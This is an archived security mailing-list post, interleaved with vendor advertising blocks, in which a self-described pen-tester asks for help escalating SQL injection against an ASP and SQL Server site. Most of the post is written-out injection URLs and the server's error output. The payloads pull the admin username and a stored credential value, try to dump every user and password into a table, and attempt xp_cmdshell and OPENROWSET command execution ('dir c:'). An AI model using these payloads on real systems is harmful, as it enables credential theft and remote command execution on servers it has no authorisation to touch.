SQL Injection ASP + SQL Server (problem) ?!

Hi,

I'm doing a pen-test in a WebServer running Win2K + IIS + ASP + SQL Server (filtred for internet connections).

The IIS appear to be very well patched. I'm trying SQL Injection. :)

I found a bug in ASP Script... see:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--

I received the name of the min(user) in users tables, see:

Technical Information (for support personnel)

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'admin' to a column of data type int.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The username is "admin". Now i want to know the password of "admin" i tryed:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--

But i received it:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more
than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

1 - Someone know how to do it return more than 1 value ?? can give-me a example ?

I tryed it too:

http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--

And i receive it:

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}' to a column of data type int.

2 - But it isn't a "password", it appear be a registry key. Someone know what is it ?? And how to do it work and see the password ? :)

3 - I tryed to create a SQL Transaction like this:

http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20(at)ret%20varchar(8000)%20set%20(at)ret=':'%20select%20(at)ret=@ret+'%20+user+'/'+senha%20from%20users%20where%20user>@ret%20select%20(at)ret%20as%20ret%20into%20alluser%20end%20--

I receive it:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
starts with '; begin declare @ret varchar(8000) set @ret=':' select @ret=@ret '  user '/' senha from users where user>@ret select @ret as' is too long. Maximum length is 128.

Someone know why i received this error ?? I overfflowed the sized allowed in paramter by variable in ASP ? or in SQL Server ? How to do it work ?? :)

4 - My last doubt. I tryed execute commands with xp_cmdshell.. see:

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--

and receive:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark
before the character string ';EXEC master..xp_cmdshell(cmd.exe /c)--'.

OR:

http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
syntax near ';EXEC master.dbo.xp_cmdshell'.

OR using quotes:

http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect
syntax near '`'.

And tryed too (use the bug to exec xp_cmdshell stored procedure with a non privilegied user):

http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--

I receive ... again the error:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The identifier that
starts with ';(SELECT * FROM
OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET FMTONLY OFF execute master..xp_cmdshell' is too long. Maximum length is 128.

If i try:

http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--

I receive:

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not create an
instance of OLE DB provider 'SQLOLEDB'.

What i'm doing wrong ?? How to do it work ??

Thkz a lot.

Best Regards.

[ ]'s